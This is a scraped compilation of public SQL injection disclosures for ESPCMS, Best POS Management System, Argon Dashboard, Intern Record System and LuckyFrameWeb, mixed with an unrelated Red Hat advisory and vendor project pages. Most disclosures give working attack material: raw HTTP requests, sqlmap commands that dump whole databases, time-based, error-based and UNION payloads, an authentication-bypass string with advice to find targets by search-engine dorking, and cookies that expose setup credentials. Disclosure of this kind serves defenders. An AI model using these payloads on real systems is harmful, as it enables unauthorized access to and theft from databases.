An issue was discovered in ESPCMS P8.21120101 after logging in to the background, there is a SQL injection vulnerability in the function node where members are added.

****Issue****

After logging in to the background, there is a SQL injection vulnerability in adding member function points

****Steps to reproduce****

1.  Log in to the management background
2.  Click Member>Add Member  
      
      
    

Problematic packets:

    GET /espcms_admin/index.php?act=X9DCVqHOg51sW5WnJNik2%2BEh6%2BhfdozuajbeQYirJJk%3D&verify_value=xxx&verify_key=username&verifyType=0 HTTP/1.1
    Host: 127.0.0.1:8010
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Connection: close
    Referer: http://127.0.0.1:8010/espcms_admin/index.php?act=RCJVc7i2vPJsW5WnJNik2yqO9KotWWATQJ%2BJr83OPQ4%3D&par_iframes_name=espcms_tab_iframe_fffab004e6898134938e4dfff70a6a36&iframes_name=espcms_tab_iframe_731749b97e8fc862e9de34d80c1fa7c8&freshid=0.07419096625411115
    Cookie: espcms_tab_iframe_5590a90a573784a598205a10098c0b2a_now_page=0; espcms_tab_iframe_5590a90a573784a598205a10098c0b2a_per_page_num=20; espcms_tab_iframe_5422a5273a8fd3166593e06f654c7965_now_page=1; espcms_tab_iframe_5422a5273a8fd3166593e06f654c7965_per_page_num=20; espcms_tab_iframe_fffab004e6898134938e4dfff70a6a36_now_page=0; espcms_tab_iframe_fffab004e6898134938e4dfff70a6a36_per_page_num=20; espcms_admin_user_info=vHzemLN06s%2BCBCZmysn5BEspscayx5moFZbFc%2BYiMsiK0A8JxQV1DgryT8ALHbP%2FpWpbeeMDWVhDSQf9nN0bg2oehJsC38ek42J4vhZ%2BEpBhUHpwgyAokKcDe9vfVTK81r9Qa0Zk0J46c5yrfur061b%2B5m%2F63da2Tp1gB7Bzm1wUVS5K648%2B8RXzpevd9RO03oyPJPqCojA0scG7KhdhwuutSQMB1m71Ng4%2BPvDfjsR%2FlRBzorN2mVwfNgUpPvbLOU0HNAi9NgJAwOPqLRQaP6G3EItDbWNtTVcfATuOhD2wspV3ear%2Bx7iP0kfiTurVPrUe%2FJPzcqhl3ubkaeNRuRhCKQsDDu8Iac%2FKrilQamMDIkjdXmZhHNY6an3KLn7247Nlm9K4zgTeEOesUWP2YGKnN0mtOfNbgBQNJRcx5rFfSW0VlP%2BVIzSxwbsqF2HCMSQ44W0oifYTfA69ictDGQ0uLADH%2BpdZ; espcms_admin_user_server_info=N8LTSEOntanP%2Bv9d2FaEWTLHmuuYWpMc8zj6G50bHR%2Fr%2BZotmzdaJM%2F6%2F13YVoRZNBBGeYuLw0rz73sgkXaYDqOpkSEbSBU5; PHPSESSID=nh6n2915gtuedqm93nql1nuv1k; espcms_setup_db=a%3A14%3A%7Bs%3A7%3A%22db_host%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A7%3A%22db_name%22%3Bs%3A15%3A%22espcms_p8_demo1%22%3Bs%3A7%3A%22db_user%22%3Bs%3A4%3A%22root%22%3Bs%3A11%3A%22db_password%22%3Bs%3A4%3A%22root%22%3Bs%3A9%3A%22db_prefix%22%3Bs%3A7%3A%22espcms_%22%3Bs%3A12%3A%22db_setuptype%22%3Bs%3A1%3A%220%22%3Bs%3A11%3A%22db_linktype%22%3Bs%3A1%3A%220%22%3Bs%3A13%3A%22module_dbdemo%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22module_app%22%3Bs%3A1%3A%220%22%3Bs%3A14%3A%22admin_username%22%3Bs%3A5%3A%22admin%22%3Bs%3A11%3A%22admin_email%22%3Bs%3A15%3A%22admin%40admin.com%22%3Bs%3A14%3A%22admin_password%22%3Bs%3A8%3A%22admin123%22%3Bs%3A19%3A%22validation_password%22%3Bs%3A8%3A%22admin123%22%3Bs%3A7%3A%22webname%22%3Bs%3A6%3A%22espcms%22%3B%7D; espcms_admin_login_verification_code=93CeyfmSi1jO%2BQUah35IwA%3D%3D
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    

use sqlmap: sqlmap.py -r ss.txt -p verify\_key --current-db

    ---
    Parameter: verify_key (GET)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: act=or73S4mLbK+u7ZRDsPSnahehmi0uNdR25zCzZisJjaI=&verify_value=xxxx&verify_key=username AND (SELECT 3018 FROM (SELECT(SLEEP(5)))QCXL)&verifyType=0
    ---

CVE-2023-23007: There is a sql injection vulnerability in ESPCMS P8.21120101 · Issue #I680WG · 轻舞飞沙/易思ESPCMS-P8企业建站管理系统 - Gitee.com

Best POS Management System version 1.0 suffers from multiple remote SQL injection vulnerabilities.

    # Exploit Title: SQL Injection on Best pos Management System# Google Dork: NA# Date: 14/2/2023# Exploit Author: Ahmed Ismail (@MrOz1l)# Vendor Homepage:https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html# Software Link:https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip# Version: 1.0# Tested on: Windows 11# CVE : NA```GET /kruxton/billing/index.php?id=9 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/109.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeReferer: http://localhost/kruxton/index.php?page=ordersCookie: PHPSESSID=61ubuj4m01jk5tibc7banpldaoUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1```# PayloadGET parameter 'id' is vulnerable. Do you want to keep testing theothers (if any)? [y/N] Nsqlmap identified the following injection point(s) with a total of 58HTTP(s) requests:---Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: id=9 AND 4017=4017    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: id=9 OR (SELECT 7313 FROM(SELECTCOUNT(*),CONCAT(0x7162767171,(SELECT(ELT(7313=7313,1))),0x7178707671,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=9 AND (SELECT 5871 FROM (SELECT(SLEEP(5)))rwMY)    Type: UNION query    Title: Generic UNION query (NULL) - 6 columns    Payload: id=-9498 UNION ALL SELECTNULL,NULL,NULL,NULL,CONCAT(0x7162767171,0x53586b446c4c75556d48544175547856636d696171464e624c6572736f55415246446a4b56777749,0x7178707671),NULL------[19:33:33] [INFO] the back-end DBMS is MySQLweb application technology: PHP 8.0.25, Apache 2.4.54back-end DBMS: MySQL >= 5.0 (MariaDB fork)```----------------------------# Exploit Title: SQL Injection on Best pos Management System# Google Dork: NA# Date: 17/2/2023# Exploit Author: Ahmed Ismail (@MrOz1l)# Vendor Homepage:https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html# Software Link:https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip# Version: 1.0# Tested on: Windows 11# CVE : NA_________python sqlmap.py -u "http://localhost/kruxton/manage_user.php?id=4*"--dbms=mysql --level 3 --risk 3 --dbs --fresh-queriesURI parameter '#1*' is vulnerable. Do you want to keep testing theothers (if any)? [y/N] Nsqlmap identified the following injection point(s) with a total of 52HTTP(s) requests:---Parameter: #1* (URI)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: http://localhost:80/kruxton/manage_user.php?id=4<http://localhost/kruxton/manage_user.php?id=4> AND 6332=6332    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: http://localhost:80/kruxton/manage_user.php?id=4<http://localhost/kruxton/manage_user.php?id=4> OR (SELECT 6586FROM(SELECT COUNT(*),CONCAT(0x716a6b6a71,(SELECT(ELT(6586=6586,1))),0x7170787871,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: http://localhost:80/kruxton/manage_user.php?id=4<http://localhost/kruxton/manage_user.php?id=4> AND (SELECT 3605 FROM(SELECT(SLEEP(5)))zHgC)    Type: UNION query    Title: Generic UNION query (NULL) - 5 columns    Payload: http://localhost:80/kruxton/manage_user.php?id=-1830<http://localhost/kruxton/manage_user.php?id=-1830> UNION ALL SELECTNULL,NULL,CONCAT(0x716a6b6a71,0x4b5276534542756c4e596a4f7377506a73517a73544b4e44737946636674736c526c775277594976,0x7170787871),NULL,NULL------[10:58:18] [INFO] the back-end DBMS is MySQLweb application technology: PHP, Apache 2.4.54, PHP 8.0.25back-end DBMS: MySQL >= 5.0 (MariaDB fork)

Best POS Management System 1.0 SQL Injection

Red Hat Security Advisory 2023-0577-01 - This release of Red Hat build of Eclipse Vert.x 4.3.7 GA includes security updates. For more information, see the release notes listed in the References section. Issues addressed include a denial of service vulnerability.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256=====================================================================                   Red Hat Security AdvisorySynopsis:          Moderate: Red Hat build of Eclipse Vert.x 4.3.7 security updateAdvisory ID:       RHSA-2023:0577-01Product:           Red Hat OpenShift Application RuntimesAdvisory URL:      https://access.redhat.com/errata/RHSA-2023:0577Issue date:        2023-02-16CVE Names:         CVE-2022-41854 CVE-2022-41881 =====================================================================1. Summary:An update is now available for Red Hat build of Eclipse Vert.x.Red Hat Product Security has rated this update as having a security impactof Moderate. A Common Vulnerability Scoring System (CVSS) base score, whichgives a detailed severity rating, is available for each vulnerability. Formore information, see the CVE pages listed in the References section.2. Description:This release of Red Hat build of Eclipse Vert.x 4.3.7 GA includes securityupdates. For more information, see the release notes listed in theReferences section.Security Fix(es):* codec-haproxy: HAProxyMessageDecoder Stack Exhaustion DoS(CVE-2022-41881)* dev-java-snakeyaml: dev-java/snakeyaml: DoS via stack overflow(CVE-2022-41854)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgements, and other related information, refer to the CVEpage(s) listed in the References section.3. Solution:Before applying the update, back up your existing installation, includingall applications, configuration files, databases and database settings, andso on.The References section of this erratum contains a download link for theupdate. You must be logged in to download the update.4. Bugs fixed (https://bugzilla.redhat.com/):2151988 - CVE-2022-41854 dev-java/snakeyaml: DoS via stack overflow2153379 - CVE-2022-41881 codec-haproxy: HAProxyMessageDecoder Stack Exhaustion DoS5. References:https://access.redhat.com/security/cve/CVE-2022-41854https://access.redhat.com/security/cve/CVE-2022-41881https://access.redhat.com/security/updates/classification/#moderatehttps://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=catRhoar.eclipse.vertx&version=4.3.7https://access.redhat.com/documentation/en-us/red_hat_build_of_eclipse_vert.x/4.3/html/release_notes_for_eclipse_vert.x_4.3/index6. Contact:The Red Hat security contact is <secalert@redhat.com>. More contactdetails at https://access.redhat.com/security/team/contact/Copyright 2023 Red Hat, Inc.-----BEGIN PGP SIGNATURE-----Version: GnuPG v1iQIVAwUBY+514NzjgjWX9erEAQiXsA//R2iUqv8p0cLhsqlXZhX8fnWgGyHT5YI/ECvfslAn+5JB/HaeZNYQpovrHadLuWU1ZWjWunbd7ioaknY/SnQXww+L+FFFVfFOa57J1okP7N8/aDzXCJmQ64lDr65j5kUwv8UPyryOe0GZH0SU9WErRAULf+Q/48wAQVl6C2rEBlhy195kH1waCuCls0BD7x3IcrmrpbCFfiIQtDcpW7SRlk691vVamzRlCHj/aWr2WWpBEG10ic6NOUjSlosfZqvMJ4deIaU+xPc+ovAwiVzoxoT7YB7wE4+N61pwpABTP2sxI2wDHtbS5C0LkEDWtvTvaVEd8CT9SYNhOI4EcN5waHzXFzRxZ4LOu92q7niL/Ao5jjHqHMbFdWfClXandpBiV54EtQuht1IHwYm/jHLDFQKoIbuO0CAjY4q6gLG/+N63gEBy5Wlpikuqy5vWW+ftCD4r32cix/dOP342NBRwhT+dZ5e3+iWXUDziXhv8a8Z4PxJOPeD7liSER8yhBU/6mxrljBBUVg7/hQCbq+2OQ33vvIaalma18MI9Oej13h/iNxYC2244Sp3EupImmwUjXOiUHyElz5QjhXe/u7qB9QQ/sDky8BL2B/3F8EnPKOUjQt+/xqCPdHXINJsLYBAGXHx/Iz6jVxg3ERFHyPW5EXR6yboIp0vAfebL5QRld3U==iFMn-----END PGP SIGNATURE-------RHSA-announce mailing listRHSA-announce@redhat.comhttps://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0577-01

Argon Dashboard version 1.1.2 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Argon Dashboard - v1.1.2 Auth By Pass Vulnerability                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 109.0(64-bit)                                              | | # Vendor    : https://www.creative-tim.com/product/argon-dashboard#                                                              |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : user : 'or''='@gmail.com1 & Pass : 'or''='[+] https://127.0.0.1/aadarshinstrumentscom/admin/examples/inquiry.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

Argon Dashboard 1.1.2 SQL Injection

SQL Injection vulnerability in Projectworlds Online Doctor Appointment Booking System, allows attackers to gain sensitive information via the q parameter to the getuser.php endpoint.

****Subscribe YouTube** For Latest Update **Click Here********100 + PHP Projects with Source Code** **

The Online Doctor Appointment Booking System PHP and Mysql is a simple project developed using PHP, JavaScript, and CSS. The project contains an admin and user sides. The admin side manages all the management like managing schedules, patient records and manage the appointment time, manage treatment facilities, and so on. The admin has an important role in the management of this Online Doctor Appointment Booking System PHP and Mysql.

This Project Like Doctor manage Personal Clinic Appointment ....small project

**Brief overview of the technology:**

Front end: HTML, CSS, JavaScript

1.  HTML: HTML is used to create and save web document. E.g. Notepad/Notepad++
2.  CSS : (Cascading Style Sheets) Create attractive Layout
3.  Bootstrap : responsive design mobile freindly site
4.  JavaScript: it is a programming language, commonly use with web browsers.

Back end: PHP, MySQL

1.  PHP: Hypertext Preprocessor (PHP) is a technology that allows software developers to create dynamically generated web pages, in HTML, XML, or other document types, as per client request. PHP is open source software.
2.  MySQL: MySql is a database, widely used for accessing querying, updating, and managing data in databases.

**Software Requirement(any one)**

*   WAMP Server
*   XAMPP Server
*   MAMP Server
*   LAMP Server

**Installation Steps**

1\. Download zip file and Unzip file on your local server.  
2\. Put this file inside "c:/xamp/htdocs/" .  
3\. Database Configuration  
Open phpmyadmin  
Create Database named db\_healthcare.  
Import database db\_healthcare.sql from downloaded folder(inside database)  
4\. Open Your browser put inside "http://localhost/PHP-Doctor-Appointment-System/"

**Admin Login Details**  
Login Id: 123  
Password: 123

****Download link****

CVE-2020-29168: Online Doctor Appointment Booking System PHP and Mysql | Projectworlds

SQL Injection vulnerability in Simple Task Managing System version 1.0 in login.php in 'username' and 'password' parameters, allows attackers to execute arbitrary code and gain sensitive information.

Submitted by razormist on Friday, August 26, 2022 - 22:47.

**Simple Task Managing System in PHP With MySQLi Free Source Code******Introduction****

The **Simple Task Managing System in PHP With MySQLi** is a simple web system coded in a **PHP** programming language. This project contains an advance coding script that display fully operational function of the system. The system contain many functionalities that use its purpose. This **Simple Task Managing System** is a project that can help students taking IT related courses. This is a simple system that tends to help beginners to start their php programming career . This **Simple Task Managing System in PHP With MySQLi** provide a learning references to help beginners learn to use **PHP** programming.

The **Simple Task Managing System in PHP With MySQLi Free Source Code** is free to be downloaded just read the content below for more info. This application is for **educational purpose only**.

****Simple Task Managing System in PHP With MySQLi Free Source Code** Basic Information**

*   **Language used:** PHP
*   **Front-end used:** HTML & CSS
*   **Coding Tool used:** Notepad++ or any text editor that can run php files
*   **Type:** Web Application
*   **Database used:** MySQLi

****About Simple Task Managing System in PHP With MySQLi****

The **Simple Task Managing System in PHP With MySQLi** was developed using **PHP** programming language. This is a user-friendly kind of application that can be easily modified to be used in your on working projects. The system contains a function that can allow user to create project title. The application is strictly protected by a user login information, you need to enter a correct username and password to fully access the feature of the system. The user can do many things in the system he/she can add new project, add task list, search projects. You can create your on project by going in the add project and enter the required field. Each project has a task list you can assign a task and change its status base on your project progression. This project tends to educate you on how to create a simple php system in a basic way.

****Simple Task Managing System in PHP With MySQLi Free Source Code** Features**

*   **Display the Overall Project**
*   **Can add new Project**
*   **Each Project has a Task**
*   **You can assign you task**
*   **Display total task for each project**

****Sample System Screenshot**:**

****Login Page****

****Add Project Page****

****Project List Page****

****Add Task Page****

****Task List Page****

****Simple Task Managing System in PHP With MySQLi Free Source Code** Installation Guide**

1.  **Download** and **Install** any **local web server** such as **XAMPP, WAMP, etc.**
2.  **Download** the source code in this site
3.  **Open** your **XAMPP Control Panel** and start **Apache** and **MySQL**.
4.  **Extract** the **downloaded source code **zip** file**.
5.  **Copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**.
6.  **Browse** the **PHPMyAdmin** in a **browser**.
7.  **Create** a **new database** name it **tasker**.
8.  **Import** the attached **SQL**file. The file name is **tasker.sql** located inside the database folder.
9.  **Browse** the **Task Management System** in a **browser**. **http://localhost/Task%20Managing%20System%20in%20PHP/**.

**User Login Information**

**Username:** admin

**Password:** admin

That's all, The **Simple Task Managing System in PHP With MySQLi** was created fully functional using **PHP** language. I hope that this project can help you to what you are looking for. For more **projects and tutorials** please kindly visit this site. Enjoy Coding!

The **Simple Task Managing System in PHP With MySQLi Free Source Code** is ready to be downloaded just kindly click the download button below.

**Related Projects & Tutorials**

Simple Task Managing System in PHP With MySQLi

*   4256 views

CVE-2022-40032: Simple Task Managing System in PHP With MySQLi Free Source Code

SQL Injection vulnerability in Intern Record System version 1.0 in /intern/controller.php in 'phone', 'email', 'deptType' and 'name' parameters, allows attackers to execute arbitrary code and gain sensitive information.

**CVE-2022-40347\_Intern-Record-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated**

CVE-2022-40347: Intern Record System - 'phone', 'email', 'deptType' and 'name' SQL Injection (Unauthenticated)

Exploit Title: Intern Record System - 'phone', 'email', 'deptType' and 'name' SQL Injection (Unauthenticated)

Date: 2022-06-09

Exploit Author: Hamdi Sevben

Vendor Homepage: https://code-projects.org/intern-record-system-in-php-with-source-code/

Software Link: https://download-media.code-projects.org/2020/03/Intern\_Record\_System\_In\_PHP\_With\_Source\_Code.zip

Version: 1.0

Tested on: Windows 10 Pro + PHP 8.1.6, Apache 2.4.53

CVE: CVE-2022-40347

References:

https://code-projects.org/intern-record-system-in-php-with-source-code/

https://download-media.code-projects.org/2020/03/Intern\_Record\_System\_In\_PHP\_With\_Source\_Code.zip

1.  Description:

Intern Record System 1.0 allows SQL Injection via parameters 'phone', 'email', 'deptType' and 'name' in /intern/controller.php Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latest vulnerabilities in the underlying database.

2.  Proof of Concept:

In sqlmap use 'phone', 'email', 'deptType' or 'name' parameter to dump 'department' database.

Then run SQLmap to extract the data from the database:

sqlmap.py -u "http://localhost/intern/controller.php" -p "deptType" --risk="3" --level="3" --method="POST" --data="phone=&email=&deptType=test&name=" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --headers="Host:localhost\\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,_/_;q=0.8\\nAccept-Encoding:gzip, deflate\\nAccept-Language:en-us,en;q=0.5\\nCache-Control:no-cache\\nContent-Type:application/x-www-form-urlencoded\\nReferer:http://localhost/intern/" --dbms="MySQL" --batch --dbs -D department --dump

sqlmap.py -u "http://localhost/intern/controller.php" -p "email" --risk="3" --level="3" --method="POST" --data="phone=&email=test&deptType=3&name=" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --headers="Host:localhost\\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,_/_;q=0.8\\nAccept-Encoding:gzip, deflate\\nAccept-Language:en-us,en;q=0.5\\nCache-Control:no-cache\\nContent-Type:application/x-www-form-urlencoded\\nReferer:http://localhost/intern/" --dbms="MySQL" --batch --dbs -D department --dump

sqlmap.py -u "http://localhost/intern/controller.php" -p "name" --risk="3" --level="3" --method="POST" --data="phone=&email=&deptType=3&name=test" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --headers="Host:localhost\\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,_/_;q=0.8\\nAccept-Encoding:gzip, deflate\\nAccept-Language:en-us,en;q=0.5\\nCache-Control:no-cache\\nContent-Type:application/x-www-form-urlencoded\\nReferer:http://localhost/intern/" --dbms="MySQL" --batch --dbs -D department --dump

sqlmap.py -u "http://localhost/intern/controller.php" -p "phone" --risk="3" --level="3" --method="POST" --data="phone=test&email=&deptType=3&name=" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --headers="Host:localhost\\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,_/_;q=0.8\\nAccept-Encoding:gzip, deflate\\nAccept-Language:en-us,en;q=0.5\\nCache-Control:no-cache\\nContent-Type:application/x-www-form-urlencoded\\nReferer:http://localhost/intern/" --dbms="MySQL" --batch --dbs -D department --dump

3.  Example payload:

\-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(\*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)\*2))x+FROM+INFORMATION\_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27

4.  Burpsuite request on 'phone' parameter:

POST /intern/controller.php HTTP/1.1

Host: localhost

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,_/_;q=0.8

Accept-Encoding: gzip, deflate

Accept-Language: en-us,en;q=0.5

Cache-Control: no-cache

Content-Length: 317

Content-Type: application/x-www-form-urlencoded

Referer: http://localhost/intern/

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36

phone=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(\*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)\*2))x+FROM+INFORMATION\_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27&email=&deptType=3&name=

5.  Burpsuite request on 'email' parameter:

POST /intern/controller.php HTTP/1.1

Host: localhost

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,_/_;q=0.8

Accept-Encoding: gzip, deflate

Accept-Language: en-us,en;q=0.5

Cache-Control: no-cache

Content-Length: 317

Content-Type: application/x-www-form-urlencoded

Referer: http://localhost/intern/

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36

phone=&email=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(\*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)\*2))x+FROM+INFORMATION\_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27&deptType=3&name=

6.  Burpsuite request on 'deptType' parameter:

POST /intern/controller.php HTTP/1.1

Host: localhost

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,_/_;q=0.8

Accept-Encoding: gzip, deflate

Accept-Language: en-us,en;q=0.5

Cache-Control: no-cache

Content-Length: 316

Content-Type: application/x-www-form-urlencoded

Referer: http://localhost/intern/

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36

phone=&email=&deptType=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(\*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)\*2))x+FROM+INFORMATION\_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27&name=

7.  Burpsuite request on 'name' parameter:

POST /intern/controller.php HTTP/1.1

Host: localhost

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,_/_;q=0.8

Accept-Encoding: gzip, deflate

Accept-Language: en-us,en;q=0.5

Cache-Control: no-cache

Content-Length: 317

Content-Type: application/x-www-form-urlencoded

Referer: http://localhost/intern/

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36

phone=&email=&deptType=3&name=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(\*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)\*2))x+FROM+INFORMATION\_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27

CVE-2022-40347: GitHub - h4md153v63n/CVE-2022-40347_Intern-Record-System-phone-V1.0-SQL-Injection-Vulnerability-Unauthenticated: CVE-2022-40347: Intern Record System - 'phone', 'email', 'deptType' and 'name' SQL Inje

A vulnerability has been found in SourceCodester Online Pizza Ordering System 1.0 and classified as critical. This vulnerability affects unknown code of the file /php-opos/index.php. The manipulation of the argument ID leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-221350 is the identifier assigned to this vulnerability.

CVE-2023-0883

LuckyframeWEB v3.5 was discovered to contain a SQL injection vulnerability via the dataScope parameter at /system/RoleMapper.xml.

src/main/resources/mybatis/system/RoleMapper.xml

There is a ${} in this mapper

<if test\="deptId != null and deptId != 0"\>
			AND (u.dept\_id = #{deptId} OR u.dept\_id IN ( SELECT t.dept\_id FROM sys\_dept t WHERE FIND\_IN\_SET (#{deptId},ancestors) ))
		</if\>
		
		${params.dataScope}
	</select\>
	

Search selectUserList to see where the this select id is used：

Query user information：  
src/main/java/com/luckyframe/project/system/role/controller/RoleController.java

Follow up the selectUserList method to see the specific implementation：

src/main/java/com/luckyframe/project/system/role/service/RoleServiceImpl.java

The parameters in the User are passed into the mapper for SQL operation. Because the datascope is controllable, the vulnerability is generated

Verification:

Splice URL and parameters according to code:

Use error injection to query the database version：

params\[dataScope\]=and+extractvalue(1,concat(0x7e,substring((select+version()),1,32),0x7e))

Select database name:

CVE-2023-24220: sql inject 1  · Issue #22 · seagull1985/LuckyFrameWeb

LuckyframeWEB v3.5 was discovered to contain a SQL injection vulnerability via the dataScope parameter at /system/DeptMapper.xml.

src/main/resources/mybatis/system/DeptMapper.xml

There is a ${} in this mapper  
  
Search selectDeptList to see where the this select id is used:  
  
/DeptController.java

Query dept information：  
  
Follow up the selectDeptList method to see the specific implementation：

/DeptServiceImpl.java

  
The parameters in the Dept are passed into the mapper for SQL operation. Because the datascope is controllable, the vulnerability is generated  

Verification:

Splice URL and parameters according to code:

Use error injection to query the database version：

params\[dataScope\]=and+extractvalue(1,concat(0x7e,substring((select+version()),1,32),0x7e))

  
Select database name:

Tag

#sql